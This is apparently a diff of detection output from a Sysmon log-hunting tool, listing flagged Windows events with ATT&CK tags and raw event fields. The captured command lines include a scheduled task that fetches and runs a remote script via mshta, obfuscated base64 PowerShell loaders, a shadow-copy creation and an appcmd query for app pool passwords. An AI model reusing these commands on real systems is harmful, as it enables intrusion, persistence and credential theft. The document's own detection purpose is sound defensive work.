+ 0
+ 0x8000000000000000
+
+
+ 16390
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:32:58.167
+ 365ABB72-208A-5CD8-0000-0010119B2400
+ 3560
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558497731.307031,2019-05-22T08:02:11.307031+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 839
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-22 04:02:11.287
+ 365ABB72-C9C3-5CE4-0000-00101F422E00
+ 2888
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-C32E-5CE4-0000-00205DF00000
+ 0xf05d
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-C9C1-5CE4-0000-00100B222E00
+ 3156
+ C:\Program Files\Internet Explorer\iexplore.exe
+ "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1600 CREDAT:275470 /prefetch:2
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969968.655114,2019-05-27T19:12:48.655114+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6182
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:47.456
+ 365ABB72-FE6F-5CEB-0000-0010D33A0C00
+ 3344
+ C:\Windows\System32\wbem\WMIC.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ WMI Commandline Utility
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443
+ 365ABB72-FE6F-5CEB-0000-0010F4370C00
+ 3448
+ C:\Windows\System32\cmd.exe
+ cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1564436000.711201,2019-07-30T01:33:20.711201+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4907
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Suspicious NetCon
+ 2019-07-29 21:33:19.556
+ 747F3D96-661E-5D3F-0000-00107F248700
+ 3164
+ C:\Windows\System32\mshta.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10.home
+ 49826
+
+ false
+ 151.101.0.133
+
+ 443
+ https
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1558452779.809883,2019-05-21T19:32:59.809883+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4129
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 15:32:59.729
+ 365ABB72-1A2B-5CE4-0000-00102F502201
+ 3772
+ C:\Windows\System32\schtasks.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Manages scheduled tasks
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-39CC-5CE3-0000-002096C70000
+ 0xc796
+ 1
+ High
+ SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9
+ 365ABB72-1A29-5CE4-0000-001079F92101
+ 2432
+ C:\Windows\System32\mshta.exe
+ "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 10154
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 22:52:27.588
+ 365ABB72-D1AB-5CC8-0000-0010DB1E4400
+ 1372
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-C494-5CC8-0000-0020E4FF0000
+ 0xffe4
+ 1
+ High
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-D0E5-5CC8-0000-0010DADF3E00
+ 2892
+ C:\Windows\System32\cmd.exe
+ cmd
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""") and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 10662
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-14 11:53:29.768
+ 747F3D96-F639-5D53-0000-0010B0FC2600
+ 8180
+ C:\Windows\System32\wscript.exe
+ 5.812.10240.16384
+ Microsoft ® Windows Based Script Host
+ Microsoft ® Windows Script Host
+ Microsoft Corporation
+ "c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-F419-5D53-0000-002026910200
+ 0x29126
+ 1
+ Medium
+ SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C
+ 747F3D96-F639-5D53-0000-001092EE2600
+ 6000
+ C:\Windows\explorer.exe
+ C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.822932,2019-05-27T05:29:18.822932+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5937
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.782
+ 365ABB72-3D6E-5CEB-0000-00106FA6FF00
+ 1876
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557667978.167195,2019-05-12T17:32:58.167195+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16389
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:30:46.275
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-2006-5CD8-0000-0010A2862300
+ 2960
+ C:\Windows\System32\rundll32.exe
+ "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6180
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:47.402
+ 365ABB72-FE6F-5CEB-0000-0010F4370C00
+ 3448
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-FD85-5CEB-0000-00104C0E0B00
+ 1944
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\System32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6180
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:47.402
+ 365ABB72-FE6F-5CEB-0000-0010F4370C00
+ 3448
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-FD85-5CEB-0000-00104C0E0B00
+ 1944
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\System32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1558452779.769825,2019-05-21T19:32:59.769825+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( gator4243.hostgator.com ) , IP ( 108.179.232.58 ) and port ( 443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4128
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 06:58:39.888
+ 365ABB72-1A29-5CE4-0000-001079F92101
+ 2432
+ C:\Windows\System32\mshta.exe
+ IEWIN7\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ IEWIN7..home
+ 49703
+
+ false
+ 108.179.232.58
+ gator4243.hostgator.com
+ 443
+ https
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556664747.588976,2019-05-01T02:52:27.588976+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 10153
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 22:49:09.276
+ 365ABB72-D0E5-5CC8-0000-0010DADF3E00
+ 2892
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-C494-5CC8-0000-0020E4FF0000
+ 0xffe4
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-D0E4-5CC8-0000-00103CB73E00
+ 3680
+ C:\Windows\Installer\MSI4FFD.tmp
+ "C:\Windows\Installer\MSI4FFD.tmp"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.742817,2019-05-27T05:29:18.742817+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5934
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.702
+ 365ABB72-3D6E-5CEB-0000-0010AFA2FF00
+ 3812
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
